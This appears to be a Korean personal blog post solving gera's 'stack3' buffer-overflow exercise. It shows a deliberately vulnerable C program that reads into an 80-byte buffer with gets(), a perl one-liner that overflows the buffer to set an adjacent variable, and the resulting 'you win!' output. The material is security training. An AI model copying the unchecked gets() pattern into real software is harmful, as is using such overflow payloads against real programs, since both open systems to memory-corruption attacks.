반응형
/*
* http://sosal.tistory.com/
* made by so_Sal
*/
/* stack3.c *
* specially crafted to feed your brain by gera */
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x01020005)
printf("you win!\n");
}
[sosal@localhost gera]$ (perl -e 'print "\x05\x00\x02\x01"x24';cat) | ./stack3
buf: bfc527e0 cookie: bfc52830
you win!
gets 함수는 00 (NULL)도 허용하기 때문에 1,2번 문제와 다름 없습니다.
음.. 음;;;
'Major Study. > System hacking' 카테고리의 다른 글
쉘코드 주소값, ret값 위치, .dtors 위치 찾기 (0) | 2010.07.04 |
---|---|
Linux :: RTL 맛보기 (0) | 2010.07.03 |
Gera _ Stack #2 (0) | 2010.04.30 |
Gera _ Stack #1 (0) | 2010.04.30 |
Gera's InsecureProgramming (0) | 2010.04.30 |